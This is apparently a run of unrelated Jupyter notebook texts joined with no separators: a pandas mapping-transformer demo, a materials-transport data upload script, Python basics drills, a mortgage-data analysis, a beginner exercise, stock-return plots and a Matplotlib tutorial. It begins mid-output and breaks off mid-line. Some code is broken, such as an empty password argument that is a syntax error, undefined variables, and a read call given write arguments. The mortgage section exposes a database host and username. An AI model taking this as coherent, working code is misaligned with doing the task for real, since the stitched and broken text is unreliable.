intercept= 11.1373229547 +/- 0.00459800607707 Temperature= 313.979193247 +/- 1.01498982895 KMappingTransformerThis notebook shows the functionality in the MappingTransformer class. This transformer maps column values to other values, using the pandas.DataFrame.replace function.import pandas as pd import numpy as np import tubular from tubular.mapping import MappingTransformer tubular.__version__Create dummy datasetdf = pd.DataFrame( { "factor1": [np.nan, "1.0", "2.0", "1.0", "3.0", "3.0", "2.0", "2.0", "1.0", "3.0"], "factor2": ["z", "z", "x", "y", "x", "x", "z", "y", "x", "y"], "target": [18.5, 21.2, 33.2, 53.3, 24.7, 19.2, 31.7, 42.0, 25.7, 33.9], "target_int": [2, 1, 3, 4, 5, 6, 5, 8, 9, 8], "target_binary": [0, 0, 1, 0, 1, 0, 0, 1, 0, 0] } ) df.head() df.dtypesSimple usage Initialising MappingTransformer The user must pass in a dict of mappings, each item within must be a dict of mappings for a specific column. In the mapping transformer the user does not specify columns, as with the most other transformers, instead this is picked up from the keys of mappings. In the case of factor1, there are null values if the user wishes to treat these they should use the imputation transformers in the package.column_mappings = { 'factor1': { '1.0': 'a', '2.0': 'b', '3.0': 'c', }, 'factor2': { 'x': 'aa', 'y': 'bb', 'z': 'cc' } } map_1 = MappingTransformer(mappings = column_mappings, copy = True, verbose = True) map_1.mappingsMappingTransformer fitThere is not fit method for the MappingTransformer as the user sets the mappings when initialising the object. MappingTransformer transformMultiple column mappings were specified when creating map_1 so these columns will be mapped when the transform method is run.df['factor1'].dtype df['factor1'].value_counts(dropna = False) df['factor2'].dtype df['factor2'].value_counts(dropna = False) df_2 = map_1.transform(df) df_2['factor1'].dtype df_2['factor1'].value_counts(dropna = False) df_2['factor2'].dtype df_2['factor2'].value_counts(dropna = False)Transforming only certain levelsIf only certain levels of a column are to be mapped then just these levels can be supplied in the mapping dict.column_mappings_2 = { 'factor1': { '1.0': '0.0', '3.0': '10.0' } } map_2 = MappingTransformer(mappings = column_mappings_2, copy = True, verbose = False) df['factor1'].dtype df['factor1'].value_counts(dropna = False).head() df_3 = map_2.transform(df) df_3['factor1'].value_counts(dropna = False).head()Column dtype conversionIf all levels of a column are included in a mapping, and the mapping converts between data types, the pandas dtype will be converted.column_mappings_3 = { 'target_binary': { 0: False, 1: True } } map_3 = MappingTransformer(mappings = column_mappings_3, copy = True, verbose = False) df['target_binary'].dtype df['target_binary'].value_counts(dropna = False).head() df_4 = map_3.transform(df) df_4['target_binary'].dtype df_4['target_binary'].value_counts(dropna = False)Unexpected dtype conversionsSpecial care should be taken if specifying only a subset of levels in a mapping - that the mapping does not introduce data type conversion. Any conversions that do happen follow the pandas dtype conversions as this transformer uses `pandas.DataFrame.map`. The example below shows how the dtype of the column 'RM' was changed by mapping a particular value to a str - following pandas dtype conversions.column_mappings_4 = { 'target_binary': { 1: True } } map_4 = MappingTransformer(mappings = column_mappings_4, copy = True, verbose = False) df['target_binary'].dtype (df['target_binary'] == 1).sum() df_5 = map_4.transform(df) df_5['target_binary'].dtype df_5['target_binary'].value_counts()Configure projectdescription = """ Ab-initio electronic transport database for inorganic materials. Here are reported the average of the eigenvalues of conductivity effective mass (mₑᶜᵒⁿᵈ), the Seebeck coefficient (S), the conductivity (σ), the electronic thermal conductivity (κₑ), and the Power Factor (PF) at a doping level of 10¹⁸ cm⁻³ and at a temperature of 300 K for n- and p-type. Also, the maximum values for S, σ, PF, and the minimum value for κₑ chosen among the temperatures [100, 1300] K, the doping levels [10¹⁶, 10²¹] cm⁻³, and doping types are reported. The properties that depend on the relaxation time are reported divided by the constant value 10⁻¹⁴. The average of the eigenvalues for all the properties at all the temperatures, doping levels, and doping types are reported in the tables for each entry. A legend of the columns of the table is provided below. """ legend = { 'ΔE': 'Band gap', 'V' : 'Volume', 'mₑᶜ': 'Eigenvalues (ε₁, ε₂, ε₃) of the conductivity effective mass and their average (ε̄)', 'S': 'Average eigenvalue of the Seebeck coefficient', 'σ' : 'Average eigenvalue of the conductivity', 'κₑ' : 'Average eigenvalue of the electrical thermal conductivity', 'PF': 'Average eigenvalue of the Power Factor', 'Sᵉ': 'Value (v), temperature (T), and doping level (c) at the \ maximum of the average eigenvalue of the Seebeck coefficient', 'σᵉ': 'Value (v), temperature (T), and doping level (c) at the \ maximum of the average eigenvalue of the conductivity', 'κₑᵉ': 'Value (v), temperature (T), and doping level (c) at the \ maximum of the average eigenvalue of the electrical thermal conductivity', 'PFᵉ': 'Value (v), temperature (T), and doping level (c) at the \ maximum of the average eigenvalue of the Power Factor', } client.projects.update_entry(pk=name, project={"other": None}).result() # ensure order client.projects.update_entry(pk=name, project={ 'description': description, 'other': legend, }).result() client.get_project(name).pretty() eigs_keys = ['ε₁', 'ε₂', 'ε₃', 'ε̄'] prop_defs = { 'mₑᶜ': "mₑ", 'S': "µV/K", 'σ': "1/fΩ/m/s", 'κₑ': "GW/K/m/s", 'PF': "GW/K²/m/s" } ext_defs = {"T": "K", "c": "µm⁻³"} columns = {"task": None, "type": None, "metal": None, "ΔE": "eV", "V": "ų"} for kk, unit in prop_defs.items(): for k in ["p", "n"]: if kk.startswith("mₑ"): for e in eigs_keys: columns[f"{kk}.{k}.{e}"] = unit else: columns[f"{kk}.{k}"] = unit for kk, unit in prop_defs.items(): if kk.startswith("mₑ"): continue for k in ["p", "n"]: path = f"{kk}ᵉ.{k}" columns[f"{path}.v"] = unit for a, b in ext_defs.items(): columns[f"{path}.{a}"] = b client.init_columns(name, columns)Prepare contributionsinput_dir = '/project/projectdirs/matgen/fricci/transport_data/coarse' # input_dir = '/Users/patrick/gitrepos/mp/mpcontribs-data/transport_coarse' props_map = { # original units 'cond_eff_mass': {"name": 'mₑᶜ', "unit": "mₑ"}, 'seebeck_doping': {"name": 'S', "unit": "µV/K"}, 'cond_doping': {"name": 'σ', "unit": "1/Ω/m/s"}, 'kappa_doping': {"name": 'κₑ', "unit": "W/K/m/s"}, } files = [x for x in os.scandir(input_dir) if x.is_file()] len(files) contributions = [] total = len(files) columns_name = "doping level [cm⁻³]" title_prefix = "Temperature- and Doping-Level-Dependence" titles = { 'S': "Seebeck Coefficient", 'σ': "Conductivity", 'κₑ': "Electrical Thermal Conductivity", 'PF': "Power Factor" } for obj in tqdm(files): identifier = obj.name.split('.', 1)[0].rsplit('_', 1)[-1] valid = bool(identifier.startswith('mp-') or identifier.startswith('mvc-')) if not valid: print(identifier, 'not valid') continue with gzip.open(obj.path, 'rb') as input_file: data = json.loads(input_file.read()) task_type = 'GGA+U' if 'GGA+U' in data['gap'] else 'GGA' gap = data['gap'][task_type] cdata = { "task": data['task_id'][task_type], "type": task_type, "metal": 'Yes' if gap < 0.1 else 'No', "ΔE": f"{gap} eV", "V": f"{data['volume']} ų" } tables = [] S2arr = [] for doping_type in ['p', 'n']: for key, v in props_map.items(): prop = data[task_type][key].get(doping_type, {}) d = prop.get('300', {}).get('1e+18', {}) unit = v["unit"] if d: eigs = d if isinstance(d, list) else d['eigs'] k = f"{v['name']}.{doping_type}" value = f"{np.mean(eigs)} {unit}" if key == 'cond_eff_mass': cdata[k] = {eigs_keys[-1]: value} for neig, eig in enumerate(eigs): cdata[k][eigs_keys[neig]] = f"{eig} {unit}" else: cdata[k] = value if key == 'seebeck_doping': S2 = np.dot(d['tensor'], d['tensor']) elif key == 'cond_doping': pf = np.mean(np.linalg.eigh(np.dot(S2, d['tensor']))[0]) * 1e-8 cdata[f"PF.{doping_type}"] = f"{pf} µW/cm/K²/s" if key != "cond_eff_mass": prop_averages, dopings, cols = [], None, ['T [K]'] pf_averages = [] temps = sorted(map(int, prop.keys())) for it, temp in enumerate(temps): row = [temp] row_pf = [temp] if dopings is None: dopings = sorted(map(float, prop[str(temp)].keys())) for idop, doping in enumerate(dopings): doping_str = f'{doping:.0e}' if len(cols) <= len(dopings): cols.append(f'{doping_str}'.replace("+", "")) d = prop[str(temp)][doping_str] row.append(np.mean(d["eigs"])) tensor = d['tensor'] if key == 'seebeck_doping': S2arr.append(np.dot(tensor, tensor)) elif key == 'cond_doping': S2idx = it * len(dopings) + idop pf = np.mean(np.linalg.eigh( np.dot(S2arr[S2idx], tensor) )[0]) * 1e-8 row_pf.append(pf) prop_averages.append(row) pf_averages.append(row_pf) df_data = [np.array(prop_averages)] if key == 'cond_doping': df_data.append(np.array(pf_averages)) for ii, np_prop_averages in enumerate(df_data): nm = "PF" if ii else v["name"] u = "µW/cm/K²/s" if ii else unit df = DataFrame(np_prop_averages, columns=cols) df.set_index("T [K]", inplace=True) df.columns.name = columns_name # legend name df.attrs["name"] = f'{nm}({doping_type})' # -> used as title by default df.attrs["title"] = f'{title_prefix} of {doping_type}-type {titles[nm]}' df.attrs["labels"] = { "value": f'{nm}({doping_type}) [{u}]', # y-axis label #"variable": columns_name # alternative for df.columns.name } tables.append(df) arr_prop_avg = np_prop_averages[:,1:] #[:,[4,8,12]] max_v = np.max(arr_prop_avg) if key[0] == 's' and doping_type == 'n': max_v = np.min(arr_prop_avg) if key[0] == 'k': max_v = np.min(arr_prop_avg) arg_max = np.argwhere(arr_prop_avg==max_v)[0] elabel = f'{nm}ᵉ' cdata[elabel] = unflatten({ f'{doping_type}.v': f"{max_v} {u}", f'{doping_type}.T': f"{temps[arg_max[0]]} K", f'{doping_type}.c': f"{dopings[arg_max[1]]} cm⁻³" }) contrib = {'project': name, 'identifier': identifier, 'is_public': True} contrib["data"] = unflatten(cdata) contrib["tables"] = tables contributions.append(contrib) len(contributions)Submit contributionsclient.delete_contributions(name) client.init_columns(name, columns) client.submit_contributions(contributions, ignore_dupes=True) query = { "project": name, # "formula_contains": "Zn", # "identifier__in": ["mp-10695", "mp-760381"], # ZnS, CuS "data__type__contains": "GGA+U", "data__metal__contains": "Yes", "data__mₑᶜ__p__ε̄__value__lte": 1, "_order_by": "data__mₑᶜ__p__ε̄__value", "_fields": ["id", "identifier", "formula", "data.mₑᶜᵒⁿᵈ.p.ε̄.value"] } client.contributions.get_entries(**query).result()Numbersa = 10 b = 10.3 type(a) type(b) c = 15 a+c a-c a*b a/c a//b c%a 2**3Strings'hello' "hello" print("Hello World!") a="kumaran system" a[3] a[1:] a[:] a[::-1] a[::3] a.count('a') a.lower() a.capitalize() a.replace('y','s') help(a.translate('kum')) help(str) 'Insert String : {} {}'.format(13,43)Lists Objectmy_list = ['a','b','c','d'] my_list.index('c') my_list.extend('e') my_list my_list.append('f') my_list my_list.append('d') my_list my_list.reverse() my_list my_list = [[1,2,3],[4,5,6],[7,8,9]] [row[1] for row in my_list]Dictionarymy_dict = {"key1":"Test","key2":1,"key3":[4,5,6],"key4":True} my_dict my_dict["key1"] my_dict.clear() help(dict) my_dict my_dict.values()Tuplestup=(1,2,3,4,2) tup.count(2) help(tup) tup.index(2) tup[2]Setsmy_set = {1,3,6,2,4,8,7,3,'s'} my_set help(my_set) my_set.remove(9) my_set my_set.discard('d') my_setBooleanTrue False not True not False ! dirVolume in drive C has no label. Volume Serial Number is 9C2E-C521 Directory of C:\Users\kumaran\Documents\FCS Python 02/28/2019 12:04 PM

. 02/28/2019 12:04 PM .. 02/28/2019 10:51 AM .ipynb_checkpoints 02/28/2019 12:04 PM 49,930 Basic Data Type & Objects.ipynb 1 File(s) 49,930 bytes 3 Dir(s) 75,846,221,824 bytes freeExploratory Data Analysis -- Summarizing the Data's Main Characteristics with Visualizations *HMDA Data for 2015 -- Simple Random Sample of 25,000 Tuples* -- This notebook explores the Home Mortgage Disclosure Act (HMDA) data for one year -- 2015.**Documentation:** *(1) From Visualization Class:* https://github.com/georgetown-analytics/XBUS-506-01.Visual_Analytics/blob/solution/EDA/Intro_Exploratory_Data_Analysis_Solutions.ipynb *(2) Top 50 matplotlib:* https://www.machinelearningplus.com/plots/top-50-matplotlib-visualizations-the-master-plots-python/ * Note: The features we to explore summ stats on are: * Loan Type (i.e. how many 0/1 action_taken grouped by loan type) * Agency * these are continuous so they may be tricky but give it a shot: population, tract_to_masamd_income, lien_status_nm, and others that are type 'object'* The most important to start populating our final report at the moment are action_taken, loan type, agency and if possible, lien status and hoepa status. \---# Importing Libraries. import pandas as pd import numpy as np import matplotlib.pyplot as plt import seaborn as sns import math import os import psycopg2 import pandas.io.sql as psql import sqlalchemy from sqlalchemy import create_engine from sklearn import preprocessing from sklearn.preprocessing import LabelEncoder from scipy import stats from pylab import* from matplotlib.ticker import LogLocator %matplotlib inline %config InlineBackend.figure_format = 'retina' # Postgres username, password, and database name. postgres_host = 'aws-pgsql-loan-canoe.cr3nrpkvgwaj.us-east-2.rds.amazonaws.com' postgres_port = '5432' postgres_username = 'reporting_user' postgres_password = '' postgres_dbname = "paddle_loan_canoe" postgres_str = ('postgresql://{username}:{password}@{host}:{port}/{dbname}' .format(username = postgres_username, password = , host = postgres_host, port = postgres_port, dbname = postgres_dbname) ) # Creating the connection. cnx = create_engine(postgres_str) # Reading the HMDA 2017 dataset; join population and education datasets appropriately for 2017 # for the first 50,000 rows -- as a dataframe using pandas: df. df = pd.read_sql_query ('''SELECT * From paddle_loan_canoe.interim_datasets.interim_hmda_lar_union_2010_to_2017_simplerand200k''', cnx) # Using pandas to view the first 5 rows (NB: python row and column countin starts at 0. df.head(5) # Display features info for our data df.info() # Note that we wrangled and cleaned the above features in our SQL scripts (see notebook) - but below we use sqlalchemy to do it in this python cell again, for clarity: #--> match the columns from above with the '' below: df2_dtype = {'action_taken': sqlalchemy.types.VARCHAR(length=56), 'year': sqlalchemy.types.INTEGER(), 'dn_reason1': sqlalchemy.types.VARCHAR(length=56), 'agency': sqlalchemy.types.VARCHAR(length=56), 'state': sqlalchemy.types.VARCHAR(length=28), 'county': sqlalchemy.types.VARCHAR(length=56), 'ln_type': sqlalchemy.types.VARCHAR(length=56), 'ln_purp': sqlalchemy.types.VARCHAR(length=56), 'ln_amt_000s': sqlalchemy.types.INTEGER(), 'hud_med_fm_inc': sqlalchemy.types.INTEGER(), 'pop': sqlalchemy.types.INTEGER(), 'rt_spread': sqlalchemy.types.NUMERIC(), 'outcome_bucket': sqlalchemy.types.VARCHAR(length=56), 'prc_blw_HS__2013_17_5yrAvg': sqlalchemy.types.INTEGER(), 'prc_HS__2013_17_5yrAvg': sqlalchemy.types.INTEGER(), 'prc_BA_plus__2013_17_5yrAvg': sqlalchemy.types.INTEGER(), 'r_birth_2013': sqlalchemy.types.INTEGER(), 'r_intl_mig_2013': sqlalchemy.types.INTEGER(), 'r_natural_inc_2013': sqlalchemy.types.INTEGER() } # --> using pandas to read Dataframe wth the feature typecasted from the sqlalchemy block above df3 = pd.read_sql (name='loans_2013__training', schema='aa_testing', chunksize=250, # <--- change this dtype= df3_dtype, method=None, con=cnx2, if_exists='replace', index=False) # Using pandas to write Dataframe to PostgreSQL and replacing table if it already exists df3.to_sql(name='loans_2013__training', schema='aa_testing', chunksize=250, dtype= df3_dtype, method=None, con=cnx2, if_exists='replace', index=False) # Statistical counts on our binary target, action_taken - 1 = approved, 0 = denied df['action_taken'].value_counts() # Group the action_taken counts by agency and loan type df.groupby(['action_taken', 'agency_abbr', 'ln_type_nm']).size().unstack(fill_value=0) # Plotting and siple bar graph of loan application outcome: loan_appl_outcome = df['action_taken'].value_counts() plt.figure(figsize=(10,8)) sns.barplot(x=loan_appl_outcome.index, y=loan_appl_outcome.values, alpha = 0.9) plt.title('Loan Application Outcome For 200K Random Sample HMDA Dataset 2010-2017', fontsize = 18) plt.ylabel('Number of Applications', fontsize = 16) plt.xlabel('Loan Application Oucome (1 = approved)', fontsize =16) plt.xticks(rotation = 0) plt.show()Welcome to jupyter notebooks! Congratulations, the hardest step is always the first one. This exercise is designed to help you get personal with the format of jupyter notebooks, as well as learn how data is accessed and manipulated in python.name = "Liz" #type your name before the pound sign, make sure you put it in quotes! age = "135" #type your age before the pound sign, make sure you put it in quotes! More on this later. address = "462C Link Hall" #type your address before the pound sign, make sure you put it in quotes! story = "My name is " + name + ". I am " + age + " years old. I am a data scientist! Find me at " + address + "." print(story)Variable types:Variables are names in your python environment where you store values. A variable can be a number, a character string, or a more complex data structure (such as a pandas spatial dataframe...more later). At the most basic level, variables representing single values can either be numbers or strings. Numeric values can be stored as intergers, floating point numbers, or complex numbers. Strings represent strings of characters, like writing. We find out what type of variable we're dealing with by using the type() function.More info here: https://mindmajix.com/python-variable-typesfrom IPython.display import Image Image("https://cdn.mindmajix.com/blog/images/Screenshot_12-460x385.png") print(type(name)) print(type(age)) print(type(address)) print(type(story)) #We can convert numeric strings to numeric formats using either float() or int() age = float(age) print(age) print(type(age)) age=int(age) print(age) print(type(age)) #But we cannot input a numeric value into a string: story = "My name is " + name + ". I am " + age + " years old. Find me at " + address + "." print(story)TASK 1: Edit the code in the above cell so that it will print your story without adding any additional lines of code.#Type story here story = "My name is " + name + ". I am " + str(age) + " years old. Find me at " + address + "." print(story)Mathematical operators in python:We're learning Python because it is a really powerful calculator. Below is a summary of common mathematical operators in Python.Image("https://i0.wp.com/makemeanalyst.com/wp-content/uploads/2017/06/Python-Operators.png") Image("https://i0.wp.com/makemeanalyst.com/wp-content/uploads/2017/06/Relational-Operators-in-Python.png") Image("https://i0.wp.com/makemeanalyst.com/wp-content/uploads/2017/06/Bitwise-Operators_python.png") Image("https://i1.wp.com/makemeanalyst.com/wp-content/uploads/2017/06/Assignment-Operator.png")We can apply mathematical operators to variables by writing equations, just like we do with a calculator. TASK 2:Using your "age" variable. how old will you be in five years (call this variable "a")? How many months have you been alive (we're going to estimate this, based on the fact that there are 12 months in a year, call this variable "b")? Are you older than 100 (call this variable "c")?#first, convert "age" back to a numeric (float) variable age = float(age) #Complete your equations in python syntax below. Remember to use "age" as a variable. a = age + 5 b = age * 12 c = age >= 100 print(a,b,c)FunctionsOften in life, we want to repeat the same sequence of operations on multiple values. To do this, we use functions. Functions are blocks of code that will repeat the same task over and over again (return some outputs) on different variables (inputs). https://docs.python.org/3/tutorial/controlflow.htmldefining-functions#For example, this function squares the input def fun1 (x): return x*x # note the indentation fun1(2) # what happens if you delete the indentation? #Functions can have more than one input: def fun2 (x, y): return x * y fun2(2,3) #experiment with different valuesTASK 3:To simplify your future restaurant interactions, write a function that calculates a 15% tip and adds it to any check amount. Name your function tip15. How much will you owe in total on a $42.75 check?#write tip15 function here def tip15 (check): # check is the bill amount return check * 1.15 tip15(42.75)TASK 4:To customize your future restaurant interactions to future exemplary service, write a function that calculates a variable tip and adds it to any check amount. Name your function tip. How much will you owe in total if you're tipping 25% on a $42.75 check?#write tip function here def tip15 (check, rate): # check is the bill amount # rate is the tipping rate expressed as a decimal, for example a 15% tip is .15 return check * (1 + rate) tip15(42.75, .25)ListsUsing base python, you can store multiple variables as a list by wrapping them in square brackets. A list can accept any kind of variable: float, integer, or string:names = ["Homer", "Marge", "Bart", "Maggie", "Lisa"] ages = [40,39,11,1,9] print(names) print(ages) type(names) type(ages)We can make lists of lists, which are more complex data objects:names_and_ages = [names, ages] print(names_and_ages) type(names_and_ages)We can extract individual values from the list using **indexing**, which in python starts with zero. We'd use our python mathematical operator on this single variable the same way we would use a calculator. For example, the age of the first person in the list is:first = ages[0] print(first)And we can ask: How old will the first numeric element on our list be in five years?ages[0]+5TASK 5:Find the name and age of the third person in your list# type answer here print(names[2]+ ' is ' + str(ages[2]) + " years old.")TASK 6:Add an extra person to the list, named Grandpa, who is 67 years old. *Hint: Google "add values to a list python" if you're not sure what to do!!!!# type answer here names.append("Grandpa") ages.append(67) print(names_and_ages)TASK 7:Maggie just had a birthday! Change her age accordingly in the list.# type answer here names_and_ages[1][3] = names_and_ages[1][3]+1 print(names_and_ages)But because lists can be either string or numeric, we cannot apply a mathematical operator to a list. For example, how old will everyone be in five years?ages + 5 #this returns an error. But hey! Errors are opportunities! Google your error message, see if you can find a workaround!For loopsOne way that we can run an entire operation on a list is to use a for loop. A for loop iterates through every element of a sequence, and completes a task or a set of tasks. Example:#Measure some strings words = ['cat', 'window', 'defenestrate'] for w in words: print(w, len(w))A very handy function that folks use a lot when write for loops is the range function. range() creates a range object, which generates list of intergers for each element in a series.print(len(ages)) # What does len() do? print(range(len(ages))) for y in range(len(ages)): print(ages[y])TASK 8:Use the range function in a for loop to add 1 year to everyone's age in the names_and_ages list and print the result to the screen.# type your for loop here for y in range(len(ages)): ages[y] = ages[y] + 1 print(names_and_ages)if/else statementsAnother thing that is commonly used in for loops is an if/else statement. This allows us to select certain attributes that we want to use to treat elements that we're iterating over differently.for y in range(len(ages)): if ages[y]>=18: print(names[y] + " is an adult") elif ages[y] >= 10: print(names[y]+" is an adolescent") else: print(names[y] + " is a child")The above statement reads: if the age of the person is greater than or equal to 18, the person is an adult, or else if the age of the person is greater than or equal to 10, the person is an adolescent, or else the person is a child.Pay attention to the use of indentation in the above statement! TASK 9:Using if, elif, and/or else statements, write a for loop that adds 1 year to everyone's life except Maggie...since we already gave her an extra birthday.# Write for loop here for y in range(len(ages)): if names[y] != "Maggie": ages[y] = ages[y] + 1 print(names_and_ages)numpy arrays and pandas dataframes For loops can take a lot of time on large datasets. To deal with this issue, we can rely on two other packages for data structures, called numpy and pandas. *Packages* are collections of *modules*. *Modules* contain executables, functions, and object types that someone else has already written for you.Numpy arrays are standard gridded data formats (lists, matrices, and multi-dimensional arrays) where all items are of one data type, and have implicit indexing. Pandas data frames allow for mixed data types to be stored in different columns, and have explicit indicing. Pandas data frames work just like excel spreadsheets. Check out [https://www.earthdatascience.org/courses/intro-to-earth-data-science/scientific-data-structures-python/numpy-arrays/] and [https://www.earthdatascience.org/courses/intro-to-earth-data-science/scientific-data-structures-python/pandas-dataframes/] to learn more. Either numpy arrays or pandas data frames allow mathematical operators to be applied to all numeric elements.We're going to start off by loading the numpy and pandas packages. We're going to short their names to "np" and "pd", just so we don't have to type as many characters. These packages should have been downloaded automatically in Anaconda, but if you can't load them, raise your hand and share you're screen. We'll talk about installing packages and everyone will be all the wiser.Note: if importing python packages is new to you, please check out [https://www.earthdatascience.org/courses/intro-to-earth-data-science/python-code-fundamentals/use-python-packages/] to learn more.import numpy as np #import the numpy package, and call it np ages = np.array(ages) ages + 5 #Wait! Did you get an error? Read it carefull...and if it doesn't make sense, try Googling it. import pandas as pd #import the pandas pacakge, and call it pd names_and_ages = pd.DataFrame({'names':names,'ages':ages}) print(names_and_ages) type(names_and_ages) #How does the "type" of variable change?The cell bellow shows how to add a new column to a pandas data frame called 'ages_5yr', and how to calculate values for the new column:names_and_ages['ages_5yr']=names_and_ages.ages + 5 print(names_and_ages)There are three(?) ways to select a column in a pandas dataframe:*? = probably many more!print(names_and_ages['names']) #index by column name print(names_and_ages.names) #call column name as an object attribute print(names_and_ages.iloc[:,0]) #use pandas built-in indexing functionThe last option, iloc, is a pandas function. The first slot (before the comma) tells us which *rows* to pick. The second slot (after the comma) tells us which *columns* to pick. To pick find the value "ages_5yrs" of the first row, for example, we could use iloc like this:print(names_and_ages.iloc[0,2])TASK 10:Create a new column in names_and_ages called "age_months", and populate it with each indiviuals age in months (approximately age in years times 12).#Complete task ten in the space below names_and_ages['age_months'] = names_and_ages.ages*12 names_and_agesTASK 11:Create a new column in names_and_ages called "maturity", and populate it with "adult", "adolescent", and "child", based on the age cutoffs mentioned above.# Create new column, fill it with empty values (np.NaN) names_and_ages['maturity']=np.NaN # Write for loop here for i in range(names_and_ages.shape[0]): if names_and_ages.ages[i]>= 18: names_and_ages.maturity.iloc[i] = "adult" elif names_and_ages.ages[i]>=10: names_and_ages.maturity.iloc[i] = "adolescent" else: names_and_ages.maturity.iloc[i] = "child" print(names_and_ages)Read in data.You will often be using python to process files or data stored locally on your computer or server. Here will learn how to use the package os to set a path to the files you want, called your working directory.import os os.listdir()This .csv file is a record of daily discharge from a USGS stream gage near campus for the past year. It contains two columns, "Date" and "Discharge". It was downloaded with some modifications from [https://maps.waterdata.usgs.gov/mapper/index.html]. This is a great source of data for surface water measurements!Now that you've got the filepath set up so that python can see your stream discharge data, let's open it as a pandas data frame using the pandas.read_csv() function. This is similar to what we would do opening new data in Excelstream = pd.read_csv('USGS_04240105_SYRACUSE_NY.csv', infer_datetime_format=True) print(type(stream)) #the "head" function is built into a pandas.DataFrame object, and it allows you to specify the number of rows you want to see stream.head(5)Here, we see the date (as "%m/%d/%Y" format) and the mean daily discharge in cubic feet/second measured by the streamgage for each day. Check documentation on an objectThe pandas dataframe is an object that is associated with many attributes and functions. How can we tell what other people have enabled their modules to do, and learn how to use them?Remember, we just read in our data (USGS_04240105_SYRACUSE_NY.csv") as a 'pandas.core.frame.DataFrame'. What does that mean?#We can ask a question: ?stream #We can ask a deeper queston: ??stream #This gives you full documentation #Or we can use the 'dot' 'tab' magic. stream. #Don't click Enter!!! Click 'Tab'. What happens? #We can use 'dot' 'tab' and question marks together! ?stream.minTASK 12: use pandas.DataFrame built in functions to determine the minimum, maximum, and mean daily discharge over the record for the station.#use pandas.DataFrame functions to assign appropriate values to the variables here. min_dis = stream.Discharge.min() max_dis = stream.Discharge.max() mean_dis = stream.Discharge.mean() print(min_dis, max_dis, mean_dis)TASK 13: create a new column called "Discharge_total" where cumulative daily discharge is calculated (hint: there are 24 x 60 x 60 seconds in a day)#enter calculations here stream['Discharge_total'] = stream.Discharge*24*60*60 stream.head()EXTRA CREDIT: Use indexing to determine the DATE on which the maximum daily discharge occured.(Hint! check out ?stream.iloc and ?stream.argmax, then try Googling "Find row where value of column is maximum in pandas DataFrame" or something similar)(Still stuck? Enter the last thing you tried in this box, and then post your unsolved code on the Questions and Answers page on blackboard).#Type your answer here, see if you can get it in one line of code! stream.Date.iloc[stream['Discharge'].idxmax()]Annual Returns & Monthly Returnsimport numpy as np import matplotlib.pyplot as plt; plt.rcdefaults() import pandas as pd import warnings warnings.filterwarnings("ignore") # yfinance is used to fetch data import yfinance as yf yf.pdr_override() # input symbol = 'AMD' start = '2007-01-01' end = '2019-01-01' # Read data dataset = yf.download(symbol,start,end) # View Data dataset.head() dataset.tail() plt.figure(figsize=(16,8)) plt.plot(dataset['Adj Close']) plt.title('Closing Price Chart') plt.xlabel('Date') plt.ylabel('Price') plt.grid(True) plt.show() monthly = dataset.asfreq('BM') monthly['Returns'] = dataset['Adj Close'].pct_change().dropna() monthly.head() monthly['Month_Name'] = monthly.index.strftime("%b") monthly['Month_Name_Year'] = monthly.index.strftime("%b-%Y") import calendar import datetime monthly = monthly.reset_index() monthly['Month'] = monthly["Date"].dt.month monthly.head() monthly.head() monthly.tail() monthly['Returns'].plot(kind='bar', figsize=(30,6)) plt.xlabel("Months") plt.ylabel("Returns") plt.title("Returns for Each Month") plt.show() monthly['Returns'].plot(kind='bar', figsize=(30,6)) plt.xlabel("Months") plt.ylabel("Returns") plt.title("Returns for Each Month") plt.xticks(monthly.index, monthly['Month_Name']) plt.show() from matplotlib import dates as mdates import datetime as dt monthly['ReturnsPositive'] = 0 < monthly['Returns'] monthly['Date'] = pd.to_datetime(monthly['Date']) monthly['Date'] = monthly['Date'].apply(mdates.date2num) colors = monthly.ReturnsPositive.map({True: 'g', False: 'r'}) monthly['Returns'].plot(kind='bar', color = colors, figsize=(30,6)) plt.xlabel("Months") plt.ylabel("Returns") plt.title("Returns for Each Month " + start + ' to ' + end) plt.xticks(monthly.index, monthly['Month_Name']) plt.show() yearly = dataset.asfreq('BY') yearly['Returns'] = dataset['Adj Close'].pct_change().dropna() yearly yearly = yearly.reset_index() yearly yearly['Years'] = yearly['Date'].dt.year yearly plt.figure(figsize=(10,5)) plt.bar(yearly['Years'], yearly['Returns'], align='center') plt.title('Yearly Returns') plt.xlabel('Date') plt.ylabel('Returns') plt.show() from matplotlib import dates as mdates import datetime as dt yearly['ReturnsPositive'] = 0 < yearly['Returns'] yearly['Date'] = pd.to_datetime(yearly['Date']) yearly['Date'] = yearly['Date'].apply(mdates.date2num) yearly colors = yearly.ReturnsPositive.map({True: 'g', False: 'r'}) plt.figure(figsize=(10,5)) plt.bar(yearly['Years'], yearly['Returns'], color=colors, align='center') plt.title('Yearly Returns') plt.xlabel('Date') plt.ylabel('Returns') plt.show() dataset['Returns'] = dataset['Adj Close'].pct_change().dropna() yearly_returns_avg = dataset['Returns'].groupby([dataset.index.year]).mean() yearly_returns_avg colors = yearly.ReturnsPositive.map({True: 'g', False: 'r'}) plt.figure(figsize=(10,5)) plt.bar(yearly['Years'], yearly['Returns'], color=colors, align='center') plt.plot(yearly_returns_avg, marker='o', color='b') plt.title('Yearly Returns') plt.xlabel('Date') plt.ylabel('Returns') plt.show()What is Matplotlib?Matplotlib is a low level graph plotting library in python that serves as a visualization utility.Matplotlib was created by .Matplotlib is open source and we can use it freely.Matplotlib is mostly written in python, a few segments are written in C, Objective-C and Javascript for Platform compatibility.import matplotlib print(matplotlib.__version__) import matplotlib.pyplot as plt import numpy as np xpoints = np.array([0,6]) ypoints = np.array([0, 250]) plt.plot(xpoints, ypoints) plt.show() #Plotting Without Line #To plot only the markers, you can use shortcut string notation parameter 'o', which means 'rings'. xpoints = np.array([1, 8]) ypoints = np.array([3, 10]) plt.plot(xpoints, ypoints, 'o') plt.show() # Multiple Points xpoints = np.array([1, 2, 6, 8]) ypoints = np.array([3, 8, 1, 10]) plt.plot(xpoints, ypoints) plt.show() # Markers ypoints = np.array([3, 8, 1, 10]) plt.plot(ypoints, marker='o') plt.show() plt.plot(ypoints, marker='*') plt.show() plt.plot(ypoints, 'o:r', ms=10, mec='#4CAF50', mfc='#4CAF50') plt.show() #Matplotlib Line ypoints = np.array([3, 8, 1, 10]) plt.plot(ypoints, linestyle='dotted') plt.show() plt.plot(ypoints, linestyle='dashed') plt.show() # Multilines y1 = np.array([3, 8, 1, 10]) y2 = np.array([6, 2, 7, 11]) plt.plot(y1) plt.plot(y2) plt.show() # Mathplotlib Labels and Title x = np.array([80, 85, 90, 95, 100, 105, 110, 115, 120, 125]) y = np.array([240, 250, 260, 270, 280, 290, 